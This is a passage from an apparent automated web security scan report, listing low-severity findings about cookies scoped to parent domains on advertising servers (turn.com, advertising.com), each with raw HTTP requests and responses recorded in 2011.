Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 00:41:27 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:26 GMT

GIF89a.............!.......,...........D..;
13.106. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=2692888823581473023&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:53:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:53:08 GMT

GIF89a.............!.......,...........D..;
13.107. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C3%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15248%7C15235%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15249%7C15235%7C15249%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/
Date: Sun, 02 Oct 2011 23:49:37 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/u
...[SNIP]...
13.108. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C5%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15250%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/
Date: Mon, 03 Oct 2011 01:52:55 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/u
...[SNIP]...
13.109. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:11:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:11:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:11:39 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...
13.110. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...
13.111. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061516.793633.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 690
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_728X90_ATF | http:\/\/www.Travelocity.com | 728 x 90 Leaderboard | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javascript">
...[SNIP]...
13.112. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.971432.797434.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:53:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 687
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 01:53:07 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 01:53:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : igougo_300X250_ATF | http:\/\/www.igougo.com | 300 x 250 Medium Rectangle | Advertising.com - Indirect -->\r\n<script type="text\/javascript">\r\n
...[SNIP]...
13.113. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:15 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:12:16 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...
13.114. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
